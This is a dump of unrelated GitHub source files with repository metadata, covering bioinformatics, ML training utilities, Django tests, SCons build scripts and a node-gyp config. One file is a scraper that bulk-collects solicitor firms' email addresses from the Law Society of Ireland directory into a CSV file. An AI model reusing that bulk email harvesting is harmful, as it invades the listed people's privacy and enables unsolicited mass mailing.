] | sanjidafirdaws@gmail.com |
52fe5c0ff1bb7e21c43186b82e52b142647c0566 | 83ed1e2f176133c03a5f6dfa504b8df15ae71efb | /python/secondary/jnet/jnet.py | d29d5ce53337781076ea7ea61b55aca71ca18040 | [] | no_license | jmborr/code | 319db14f28e1dea27f9fc703be629f171e6bd95f | 32720b57699bf01803367566cdc5fff2b6bce810 | refs/heads/master | 2022-03-09T16:11:07.455402 | 2019-10-28T15:03:01 | 2019-10-28T15:03:01 | 23,627,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,652 | py | #!/usr/bin/python
import os,sys,re
from jobs.job import pastry
from inputArgs.inputArgs import inpHand
from utilities.small_utilities import Bye,junkName
from utilities.codedir import codedir
from seq.blastManager import blastRun
from seq.fastaManager import importFastaEntry
from seq.msa import gen_msa
from seq.letters import one2three
#create frequency file
def createFreqFile(seq,msa):
    '''
    Build the per-position amino-acid frequency table expected by jnet,
    write it to a temporary "*.jnetfreq" file and return that file name.

    seq: query sequence
    msa: multiple sequence alignment in a list, in the style of 3590
    and e10. msa does not contain the query sequence, and each
    template sequence is a list item (gapped to the query length)
    '''
    aas = 'ARNDCQEGHILKMFPSTWYV'  # amino acid column order assumed by jnet
    n_res = len(seq)
    counts = [[0] * 20 for _ in range(n_res)]
    # Tally the query together with every aligned template sequence.
    for sequence in [seq] + list(msa):
        for pos in range(n_res):
            col = aas.find(sequence[pos])
            if col >= 0:  # skip characters not in aas (like "X" or "-")
                counts[pos][col] += 1
    freqfile = junkName() + '.jnetfreq'
    out = open(freqfile, 'w')
    for pos in range(n_res):
        total = sum(counts[pos])
        # Scale each count to tenths of the column total, rounded to the
        # nearest integer, and emit the 20 values as fixed-width fields.
        fields = ['%3d' % round((10.0 * counts[pos][col]) / total) for col in range(20)]
        out.write(''.join(fields) + '\n')
    out.close()
    return freqfile
#########################################################
# SCRIPT EXECUTION STARTS HERE
#########################################################
# Parse command-line options; inpHand injects fastaf/blasttarf/outf into locals().
inpHand('Usage: inprosp.py [options]',
        ' -a _RA_fastaf sequence file in fasta format',
        ' -b _A_blasttarf tarred blast output (contains xxxxx.blast,xxxxx.pssm). If not provided, jnet.py will do a psiblast run',
        ' -c _A_outf output file name (def: ./seq.dat)',
        ).parse(locals(),sys.argv)
currd=os.getcwd() #current directory
if not outf: outf=currd+'/seq.dat' #output file
workd=currd+'/'+junkName() ;os.system('/bin/mkdir -p '+workd) ; os.chdir(workd) #temp directory
header,seq=importFastaEntry(open(fastaf,'r'))
pastry('/bin/cp '+fastaf+' .') ;fastaf=os.path.basename(fastaf)
#Retrieve/create psiblast outputs
if blasttarf:#we passed a *.tar file containing psiblast report and pssm file
    blastOuts={'outf':'', 'blast':'', 'chk':'', 'fasta':fastaf, 'pssm':''}
    os.system('tar xf '+blasttarf)
    blastOuts['blast']=os.popen('ls -1 *.blast').readline().strip() #get name of blast report
    blastOuts['pssm']=os.popen('ls -1 *pssm.').readline().strip() #get name of pssm file
else: blastOuts=blastRun(fastaf) #run blast with default options
#create multiple sequence alignment projected to the query sequence (3590 or e10 style)
msa=gen_msa(seq,header,Eco=0.0001,maxId=0.85,minId=0.10,red=0.75,blastOuts=blastOuts)['alignments']
#find frequency table from msa, and output to "freq" file. I did this
#function because PSIBLAST has evolved and the perl script "getfreq"
#provided in the jnet distro does not work. I could use newer script
#"parse_psi -freq" but it requires a psiblast report obtained with
#blastpgp -m 6, instead of blastpgp -m 0. I don't want to run PSIBLAST
#twice and running with -m 6 gives some humongously-sized reports
blastffreq=createFreqFile(seq,msa)
#remove too short sequences, then keep only the first M sequences
msa2=[] ; N=len(seq) ; Lhalf=N/2
for seqgapped in msa:
    sequngapped=seqgapped.replace('-','')
    if len(sequngapped) > Lhalf: msa2.append(sequngapped)
M=int(1000*200/N) #maximum number of sequences to use
msa=msa2[0:M] #reclaim memory space by liberating the gapped sequences list
#output alignment in a format suitable for clustalw
rootname=junkName()
fastasf=rootname+'.aln' ; fpt=open(fastasf,'w')
fpt.write('>00000\n'+seq+'\n')
for i in range(len(msa)): fpt.write('>'+'%05d\n'%(i+1)+msa[i]+'\n')
fpt.close()
#run clustalw
os.system('clustalw -OUTORDER=INPUT -INFILE='+fastasf+' -OUTPUT=GCG >/dev/null')
msf=rootname+'.msf'
if not os.path.exists(msf): Bye('ERROR: not msf file generated in jnet.py')
#run perl scripts to create the various inputs required by jnet
pastry('/bin/cp -r '+codedir+'/bin/jnet/perl .')
pastry('/bin/cp -r '+codedir+'/bin/jnet/bin .')
os.system('./perl/msf2jnet '+msf) ; msffa=msf+'.fa' #multiple sequence alignment
os.system('./perl/gethmm '+msf+' >/dev/null') ; msfhm=msf+'.hmmprof' #hidden-Markov model
pssmf=blastOuts['pssm']
os.system('./perl/getpssm '+pssmf+' > '+pssmf+'.jnetpssm') ; pssmf=pssmf+'.jnetpssm'
#run jnet and parse its report to generate seq.dat
jnetout=junkName()
os.system('./bin/jnet -p '+msffa+' '+msfhm+' '+pssmf+' '+blastffreq+' > '+jnetout)
pattern=re.compile(':\s(\S+)\n') ; final='' ; conf=''
# map jnet secondary-structure symbols to seq.dat numeric codes
ss2nn={'-':1, 'H':2, 'E':4}
for line in os.popen('grep -P "\sFINAL\t" '+jnetout).readlines():
    final+=pattern.search(line).group(1)
for line in os.popen('grep -P "\sCONF\t" '+jnetout).readlines():
    conf+=pattern.search(line).group(1)
# write seq.dat: index, three-letter residue, ss code, confidence
out=open(outf,'w')
for i in range(N):
    out.write( '%5d%6s%5d%5d\n'%( i+1, one2three[seq[i]], ss2nn[final[i]], int(conf[i]) ) )
out.close()
#clean-up working directory
os.chdir(currd)
#os.system('/bin/rm -rf '+workd)
sys.exit(0)
| [
"borreguero@gmail.com"
] | borreguero@gmail.com |
3c7e836b0ae3a089ae38ec027c2ac8499c8a5dc1 | 7dfe4fad8d7b3583a5a69bb566fdb42910d6b50b | /models/submethods.py | 834c373886c3fe2e45edbdb2271241547d3c003f | [] | no_license | take610/komugi | 35c9926035b42cc5fc373b208c838daef1c7afde | dea71fb8d1765ce761d075c5298262e82b337c71 | refs/heads/master | 2022-11-23T11:30:46.783806 | 2020-07-27T16:51:07 | 2020-07-27T16:51:07 | 281,337,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | import torch
from torch import nn
class LabelSmoothing(nn.Module):
def __init__(self, smoothing = 0.05):
super(LabelSmoothing, self).__init__()
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
def forward(self, x, target):
if self.training:
x = x.float()
target = target.float()
logprobs = torch.nn.functional.log_softmax(x, dim=-1)
nll_loss = -logprobs * target
nll_loss = nll_loss.sum(-1)
smooth_loss = -logprobs.mean(dim=-1)
loss = self.confidence * nll_loss + self.smoothing * smooth_loss
return loss.mean()
else:
return torch.nn.functional.cross_entropy(x, target) | [
""
] | |
3c14f798c81ccf5b68cfd4c2f17fa28fbda526b5 | ad2692dc7b93e58707ea066d8c2af2581b09fe6d | /slcount.py | 82d2bdf6e62ee6e3a6d432e31bbd8cc5df09443b | [] | no_license | fedefraba/Python | 01087ed5919f8cc4c21e032bb6125246be836962 | 93d8d78b92ba87b112ff2118cc47b29d355cecab | refs/heads/master | 2021-02-06T02:34:44.531951 | 2020-03-11T23:24:46 | 2020-03-11T23:24:46 | 243,865,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py |
def single_letter_count(string,letter):
return string.lower().count(letter.lower())
print(single_letter_count("fruby","r")) | [
"fedefraba@gmail.com"
] | fedefraba@gmail.com |
80137af34837964be8bf789dbbcf21a7a1f05a3a | 3d386ef093427c227f0ba6637eedfbce044a2e9e | /tfbert/optimization/create_optimizer.py | ac6c1abc5c6bf2aebe07f51b89fe61f37dbec2ae | [] | no_license | HaierAI/tfbert | c3eeb77af70e79e925e72c393a3e8229feaf1a4a | 3779e59a4ebe7458ae732fef547f1168badbba2b | refs/heads/master | 2023-07-09T05:25:19.015760 | 2021-08-16T12:27:37 | 2021-08-16T12:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,278 | py | # -*- coding:utf-8 -*-
# @FileName :create_optimizer.py
# @Time :2021/1/31 19:58
# @Author :huanghui
import tensorflow.compat.v1 as tf
from .adamw import AdamWeightDecayOptimizer
from .lamb import LAMBOptimizer
from .schedule import lr_schedule
def create_optimizer(
learning_rate,
num_train_steps=None,
num_warmup_steps=None,
optimizer_type='adamw',
epsilon=1e-6,
momentum=0.,
weight_decay=0.01,
decay_method='poly',
mixed_precision=False,
init_loss_scale=2 ** 32
):
if decay_method is not None and num_train_steps is not None and num_warmup_steps is not None:
num_train_steps = int(num_train_steps)
num_warmup_steps = int(num_warmup_steps)
learning_rate = lr_schedule(
learning_rate, num_train_steps, num_warmup_steps,
decay_method=decay_method, optimizer_type=optimizer_type
)
if optimizer_type == 'adamw':
optimizer = AdamWeightDecayOptimizer(
learning_rate=learning_rate,
weight_decay_rate=weight_decay,
beta_1=0.9,
beta_2=0.999,
epsilon=epsilon,
exclude_from_weight_decay=["LayerNorm", "layer_norm", "bias"]
)
elif optimizer_type == 'lamb':
optimizer = LAMBOptimizer(
learning_rate,
weight_decay_rate=weight_decay,
beta_1=0.9,
beta_2=0.999,
epsilon=epsilon,
exclude_from_weight_decay=["LayerNorm", "layer_norm", "bias"]
)
elif optimizer_type == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate=learning_rate,
beta1=0.9,
beta2=0.999,
epsilon=epsilon)
elif optimizer_type == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(
learning_rate=learning_rate
)
elif optimizer_type == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate=learning_rate,
rho=0.95,
epsilon=epsilon,
)
elif optimizer_type == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate=learning_rate,
initial_accumulator_value=0.1
)
elif optimizer_type == 'rmsp':
optimizer = tf.train.RMSPropOptimizer(
learning_rate=learning_rate,
decay=0.9,
momentum=momentum,
epsilon=epsilon,
)
else:
raise ValueError('Unsupported optimizer option: %s' % optimizer_type)
if mixed_precision:
loss_scaler = tf.train.experimental.DynamicLossScale(
initial_loss_scale=init_loss_scale, increment_period=1000,
multiplier=2.0)
optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(optimizer, loss_scaler)
loss_scale_value = tf.identity(loss_scaler(), name="loss_scale")
return optimizer
def create_train_op(
optimizer,
grads_and_vars,
max_grad=1.0,
mixed_precision=False,
gradient_accumulation_steps=1):
global_step = tf.train.get_or_create_global_step()
if gradient_accumulation_steps > 1:
local_step = tf.get_variable(name="local_step", shape=[], dtype=tf.int32, trainable=False,
initializer=tf.zeros_initializer)
batch_finite = tf.get_variable(name="batch_finite", shape=[], dtype=tf.bool, trainable=False,
initializer=tf.ones_initializer)
accum_vars = [tf.get_variable(
name=tvar.name.split(":")[0] + "/accum",
shape=tvar.shape.as_list(),
dtype=tf.float32,
trainable=False,
initializer=tf.zeros_initializer()) for tvar in tf.trainable_variables()]
reset_step = tf.cast(tf.math.equal(local_step % gradient_accumulation_steps, 0), dtype=tf.bool)
local_step = tf.cond(reset_step, lambda: local_step.assign(tf.ones_like(local_step)),
lambda: local_step.assign_add(1))
grads_and_vars_and_accums = [(gv[0], gv[1], accum_vars[i]) for i, gv in enumerate(grads_and_vars) if
gv[0] is not None]
grads, tvars, accum_vars = list(zip(*grads_and_vars_and_accums))
all_are_finite = tf.reduce_all(
[tf.reduce_all(tf.is_finite(g)) for g in grads]) if mixed_precision else tf.constant(
True,
dtype=tf.bool)
batch_finite = tf.cond(reset_step,
lambda: batch_finite.assign(
tf.math.logical_and(tf.constant(True, dtype=tf.bool), all_are_finite)),
lambda: batch_finite.assign(tf.math.logical_and(batch_finite, all_are_finite)))
# This is how the model was pre-trained.
# ensure global norm is a finite number
# to prevent clip_by_global_norm from having a hizzy fit.
(clipped_grads, _) = tf.clip_by_global_norm(
grads, clip_norm=max_grad)
accum_vars = tf.cond(reset_step,
lambda: [accum_vars[i].assign(grad) for i, grad in enumerate(clipped_grads)],
lambda: [accum_vars[i].assign_add(grad) for i, grad in enumerate(clipped_grads)])
def update(accum_vars):
return optimizer.apply_gradients(list(zip(accum_vars, tvars)))
update_step = tf.identity(
tf.cast(tf.math.equal(local_step % gradient_accumulation_steps, 0), dtype=tf.bool),
name="update_step")
update_op = tf.cond(update_step,
lambda: update(accum_vars), lambda: tf.no_op())
new_global_step = tf.cond(tf.math.logical_and(update_step, batch_finite),
lambda: global_step + 1,
lambda: global_step)
new_global_step = tf.identity(new_global_step, name='step_update')
train_op = tf.group(update_op, [global_step.assign(new_global_step)])
else:
grads_and_vars = [(g, v) for g, v in grads_and_vars if g is not None]
grads, tvars = list(zip(*grads_and_vars))
all_are_finite = tf.reduce_all(
[tf.reduce_all(tf.is_finite(g)) for g in grads]) if mixed_precision else tf.constant(True,
dtype=tf.bool)
# This is how the model was pre-trained.
# ensure global norm is a finite number
# to prevent clip_by_global_norm from having a hizzy fit.
(clipped_grads, _) = tf.clip_by_global_norm(
grads, clip_norm=max_grad)
# 这里不要传入global step,adam内部没有对global step累加
# 而原本adam等tf内置优化器会累加,这样就会造成global step重复增加
train_op = optimizer.apply_gradients(
list(zip(clipped_grads, tvars)))
new_global_step = tf.cond(all_are_finite, lambda: global_step + 1, lambda: global_step)
new_global_step = tf.identity(new_global_step, name='step_update')
train_op = tf.group(train_op, [global_step.assign(new_global_step)])
return train_op
| [
"m13021933043@163.com"
] | m13021933043@163.com |
50499ed278f1c769e6003b5e965f70ca46dd96e2 | 8972658ca2c64703e8281db89d7a6ac47cbabbf7 | /backend/tests/models.py | db9754be03118136304be7ed51dc6c7b912ed427 | [
"MIT"
] | permissive | denisorehovsky/linkanywhere | 15721824719cc8a959cdddb4178cfe754eb4862d | e21d6725fbe0e74a7301e40f9d9bdbac17c68e68 | refs/heads/master | 2022-07-21T16:16:17.412930 | 2017-08-24T06:32:37 | 2017-08-24T06:32:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 567 | py | import uuid
from django.db import models
from linkanywhere.apps.base.behaviors import Published
class TestModel(models.Model):
"""
Base for test models that sets app_label, so they play nicely.
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
class Meta:
app_label = 'tests'
abstract = True
class BasicModel(TestModel):
text = models.CharField(max_length=100)
class LikeModel(TestModel):
text = models.CharField(max_length=100)
class PublishedModel(Published, TestModel):
pass
| [
"denis.orehovsky@gmail.com"
] | denis.orehovsky@gmail.com |
bd9e3d8529d21ceea5715087109dabadddcf6110 | 8a250a2e9606e59f814441a9a58544f9c9799931 | /app/__init__.py | 43e91d86655b50b7d6ed9bb60755bc8246853659 | [] | no_license | magalvez/customerservice | 68a9c5e8941c064f201461ba4b0270d79bb12a4a | 994a7212633f2e9dcfd77a3b167fe2284188470f | refs/heads/master | 2023-04-20T16:16:25.977589 | 2021-05-09T00:37:46 | 2021-05-09T00:37:46 | 365,247,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | """
Flask app module
"""
from os import environ
from flask import Flask
app = Flask(__name__)
app.config.from_object("default_config")
AUTH_USER = environ.get("AUTH_USER") or 'playvox'
AUTH_PASS = environ.get("AUTH_PASS") or 'pl4yv0x'
AUTH_API_V1_URL = environ.get("ATS_API_V1_URL") or 'http://localhost:8100/service/auth'
US_API_V1_URL = environ.get("US_API_V1_URL") or 'http://localhost:8200/userservice/api/v1.0'
BAS_API_V1_URL = environ.get("BAS_API_V1_URL") or 'http://localhost:8300/bankaccountservice/api/v1.0'
AUTH_URL = AUTH_API_V1_URL
US_VALIDATE_USER_ACCOUNT_URL = US_API_V1_URL + '/validate-user-account'
BANK_ACCOUNT_GET_ACCOUNT_URL = BAS_API_V1_URL + '/account/{user_id}'
BANK_ACCOUNT_DEPOSIT_URL = BAS_API_V1_URL + '/account/{account_number}/deposit'
BANK_ACCOUNT_WITHDRAWAL_URL = BAS_API_V1_URL + '/account/{account_number}/withdrawal'
# TRM
TRM_USER_SERVICE_URL = 'https://trm-colombia.vercel.app/?date={}'
| [
"galvez.alejo@gmail.com"
] | galvez.alejo@gmail.com |
83c9e1cef1bf0fd0cd9b81c52c7537538af0d398 | d875c4556aa03193cb81fbf6388faee91c2b3de0 | /basic_programming/imtired.py | 348cd81ee858b2c49c6ea0b19ce442b0df7210e1 | [] | no_license | JeongaHan/pythonprogramming | 820abff1567b4b96a4f7edbbb27925840dcc3a20 | 00819cae30c2a7b0d5b67b14739c57919b68dbd0 | refs/heads/master | 2023-05-20T09:22:37.024797 | 2021-06-07T00:10:19 | 2021-06-07T00:10:19 | 294,134,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | print("I am soooooo tired")
print("I am sooooooooooooooooooo tired....")
print("Hi") | [
"ab012121@naver.com"
] | ab012121@naver.com |
9ab61ddea3a8f45f1f40b9490b41e4da6d9a6544 | 786de89be635eb21295070a6a3452f3a7fe6712c | /SConsTools/tags/V00-00-16/src/standardExternalPackage.py | f433403d52307a3f120d028b2d80755d194bb0c7 | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,349 | py | #===============================================================================
#
# SConscript fuction for standard external package
#
# $Id$
#
#===============================================================================
import os
import sys
from os.path import join as pjoin
from fnmatch import fnmatch
from SCons.Defaults import *
from SCons.Script import *
from SConsTools.trace import *
from SConsTools.dependencies import *
#
# This is an interface package for the external package. We wan to make
# symlinks to the include files, libs and binaries
#
# build package name from prefix and directory
def _absdir ( prefix, dir ):
if not dir :
return None
if prefix and not os.path.isabs( dir ) :
dir = pjoin( prefix, dir )
if not os.path.isdir( dir ) :
dir = None
return dir
def _glob ( dir, patterns ):
if patterns is None :
return os.listdir(dir)
# patterns could be space-separated string of patterns
if isinstance(patterns,(str,unicode)) :
patterns = patterns.split()
if not patterns : return []
result = []
for l in os.listdir(dir) :
for p in patterns :
if fnmatch ( l, p ) : result.append(l)
return result
#
# Define all builders for the external package
#
def standardExternalPackage ( package, **kw ) :
""" Understands following keywords (all are optional):
PREFIX - top directory of the external package
INCDIR - include directory, absolute or relative to PREFIX
PYDIR - Python src directory, absolute or relative to PREFIX
PYDIRSEP - if present and evaluates to True installs python code to a
separate directory arch/$LUSI_ARCH/python/<package>
LIBDIR - libraries directory, absolute or relative to PREFIX
LINKLIBS - library names to link, or all libs if not present
BINDIR - binaries directory, absolute or relative to PREFIX
LINKBINS - binary names to link, or all libs if not present
PKGLIBS - names of libraries that have to be linked for this package
DEPS - names of other packages that we depend upon
"""
pkg = os.path.basename(os.getcwd())
trace ( "Standard SConscript for external package `"+package+"'", "SConscript", 1 )
env = DefaultEnvironment()
prefix = kw.get('PREFIX',None)
trace ( "prefix: %s" % prefix, "standardExternalPackage", 3 )
# link include directory
inc_dir = _absdir ( prefix, kw.get('INCDIR',None) )
if inc_dir :
trace ( "include_dir: %s" % inc_dir, "standardExternalPackage", 5 )
# make 'geninc' directory if not there yet
archinc = Dir(env.subst("$ARCHINCDIR"))
archinc = str(archinc)
if not os.path.isdir( archinc ) : os.makedirs( archinc )
target = pjoin(archinc,package)
if not os.path.lexists(target) : os.symlink ( inc_dir, target )
# link python directory
py_dir = _absdir ( prefix, kw.get('PYDIR',None) )
if py_dir :
trace ( "py_dir: %s" % py_dir, "standardExternalPackage", 5 )
if kw.get('PYDIRSEP',False) :
# make a link to the whole dir
targ = env.Symlink ( Dir(pjoin(env.subst("$PYDIR"),package)), Dir(py_dir) )
env['ALL_TARGETS']['LIBS'].extend ( targ )
else :
# make links for every file in the directory
files = os.listdir(py_dir)
for f in files :
loc = pjoin(py_dir,f)
if not os.path.isdir(loc) :
targ = env.Symlink ( pjoin(env.subst("$PYDIR"),f), loc )
env['ALL_TARGETS']['LIBS'].extend( targ )
# link all libraries
lib_dir = _absdir ( prefix, kw.get('LIBDIR',None) )
if lib_dir :
trace ( "lib_dir: %s" % lib_dir, "standardExternalPackage", 5 )
# make a list of libs to link
libraries = kw.get('LINKLIBS',None)
trace ( "libraries: %s" % libraries, "standardExternalPackage", 5 )
libraries = _glob ( lib_dir, libraries )
trace ( "libraries: %s" % libraries, "standardExternalPackage", 5 )
for f in libraries :
loc = pjoin(lib_dir,f)
if os.path.isfile(loc) :
#targ = env.Install( "$LIBDIR", loc )
targ = env.Symlink ( pjoin(env.subst("$LIBDIR"),f), loc )
trace ( "linklib: %s -> %s" % (str(targ[0]),loc), "standardExternalPackage", 5 )
env['ALL_TARGETS']['LIBS'].extend ( targ )
# link all executables
bin_dir = _absdir ( prefix, kw.get('BINDIR',None) )
if bin_dir :
trace ( "bin_dir: %s" % bin_dir, "standardExternalPackage", 5 )
# make list of binaries to link
binaries = kw.get('LINKBINS',None)
binaries = _glob ( bin_dir, binaries )
for f in binaries :
loc = pjoin(bin_dir,f)
if os.path.isfile(loc) :
targ = env.Symlink ( pjoin(env.subst("$BINDIR"),f), loc )
env['ALL_TARGETS']['BINS'].extend ( targ )
# add my libs to a package tree
setPkgLibs ( env, package, kw.get('PKGLIBS',[]) )
# add packages that I depend on
setPkgDeps ( env, package, kw.get('DEPS',[]) )
| [
"salnikov@b967ad99-d558-0410-b138-e0f6c56caec7"
] | salnikov@b967ad99-d558-0410-b138-e0f6c56caec7 |
b6e3a0da56981092c518c6077a20a0198020c546 | 9c379d265778d3672adac2cb4340dc7b3770e82c | /main.py | ac0e55f33eee9255407a63dd75fa9458dfa10505 | [] | no_license | tunstek/lawsociety.ie_email_scraper | 9de488e1baac54d21876b7fee826f4c71c47534f | eaee94e252cdd3b06f08488cafd82475e66738dd | refs/heads/master | 2021-08-08T23:23:50.540429 | 2017-11-11T15:44:58 | 2017-11-11T15:44:58 | 110,357,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,253 | py | import sys
sys.path.append("/usr/local/lib/python2.7/site-packages")
from lxml import html
import requests
#**************************************
#********* MAIN PROGRAM ***************
#**************************************
def main():
counties = ["Antrim","Armagh","Carlow","Cavan","Clare","Cork",
"Derry","Donegal","Down","Dublin","Fermanagh","Galway",
"Kerry","Kildare","Kilkenny","Laois","Leitrim","Limerick",
"Longford","Louth","Mayo","Meath","Monaghan","Offaly",
"Roscommon","Sligo","Tipperary","Tyrone","Waterford",
"Westmeath","Wexford","Wicklow"]
emailCount = 0;
# Clear the previous .csv
f = open("emails.csv","w+")
f.write("")
f.close()
noSeperationUnique(counties)
def noSeperationUnique(counties):
# gives a unique list of all emails
allEmails = []
emailCount = 0
# Scrape info for each county
print "Scraping emails.."
for county in counties:
url = "https://www.lawsociety.ie/Find-a-Solicitor/Solicitor-Firm-Search/?filters=t_tab2!l_"+county+"!s_firmname!p_150!n_1#tab2"
tree = html.fromstring(requests.get(url).content)
emails = tree.xpath('//*[@class="base clearfix"]/div/div[1]/div[2]/div[2]/a[1]/text()')
emailCount = emailCount + len(emails)
allEmails.extend(emails)
print "\n\nTotal Emails:", emailCount
#Remove duplicates
allEmails = list(set(allEmails))
#Write to .csv
print "Writing to .csv.."
f = open("emails.csv","a")
for email in allEmails:
f.write(email+"\n")
f.close()
def countySeperated(counties):
# Will contain duplicates
emailCount = 0
# Scrape info for each county
for county in counties:
url = "https://www.lawsociety.ie/Find-a-Solicitor/Solicitor-Firm-Search/?filters=t_tab2!l_"+county+"!s_firmname!p_150!n_1#tab2"
tree = html.fromstring(requests.get(url).content)
emails = tree.xpath('//*[@class="base clearfix"]/div/div[1]/div[2]/div[2]/a[1]/text()')
emailCount = emailCount + len(emails)
print "\n\n", county
print emails
print "\n\nTotal Emails:", emailCount
if __name__ == '__main__':
main()
| [
"tunstek@tcd.ie"
] | tunstek@tcd.ie |
320464340ee7fd6e0274866a46bba250709cf1c2 | abecf9dcfac54caef27dbb3dcb82babadd9904e0 | /Net/__init__.py | 56367dc6ca5dd633d5ff4c98042c22e7e1658cbe | [
"MIT"
] | permissive | SWT-AITeam/GHE-LPC | f27630fa36ff2fe7249892232c981129c28e9057 | 2a10f423d747aa28560a3bcbf29f7ec87422beb8 | refs/heads/main | 2023-09-01T13:31:19.466871 | 2021-10-23T13:47:28 | 2021-10-23T13:47:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | from .MyModel import MyModel
from .LabelSmoothLoss import LabelSmoothLoss
| [
"hanrd@foxmail.com"
] | hanrd@foxmail.com |
2b90598d9fb955462761d3ab09d7b242cd0ff23d | 63cf040b00cb7a81baacb4fcbceac0b5fe278f82 | /ch09/dataset_dummy.py | fda4589e1f6eb9700dab35c2c66ee54f60abe94a | [] | no_license | mindw96/nalcoding | 64a16dab7c51510f1a6f07fc8c3b4a0dff054263 | b7104f17ba5ee9cac417c2f0c8bdaccab5d54664 | refs/heads/master | 2023-05-04T08:23:10.144124 | 2021-05-28T13:47:41 | 2021-05-28T13:47:41 | 349,375,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | from dataset import Dataset
class DummyDataset(Dataset):
def __init__(self, name, mode, input_shape, output_shape):
super(DummyDataset, self).__init__(name, mode)
self.input_shape = input_shape
self.output_shape = output_shape
self.tr_xs, self.tr_ys = [], []
self.te_xs, self.te_ys = [], []
| [
"mindw96@naver.com"
] | mindw96@naver.com |
6789512f4fd4b7f6a31a460b4fef7ea02ab05d1a | ea911344f2dd24e37afc9fd813826c8988057608 | /node_modules/websocket/build/config.gypi | 503630b9608474a864613d1c16af7dd42099471b | [
"Apache-2.0"
] | permissive | evrimulgen/websocket-chat-room | 21e3bcb6a15f6ba67ac0efc6ee8a46faf53ca7ee | c0ebde1d3023d41ac814bca3af1e7687a5a915c0 | refs/heads/master | 2021-04-30T01:38:11.650441 | 2018-02-03T16:41:31 | 2018-02-03T16:41:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,340 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"debug_devtools": "node",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt57l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt57l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "57",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 48,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "48.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_inspector": "true",
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/FuD/.node-gyp/6.9.1",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/Users/FuD/.nvm/versions/node/v6.9.1/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/Users/FuD/.nvm/versions/node/v6.9.1/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"global_style": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/FuD/.npm-init.js",
"userconfig": "/Users/FuD/.npmrc",
"node_version": "6.9.1",
"user": "501",
"save": "true",
"editor": "vi",
"tag": "latest",
"global": "",
"progress": "true",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/FuD/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/3.10.8 node/v6.9.1 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
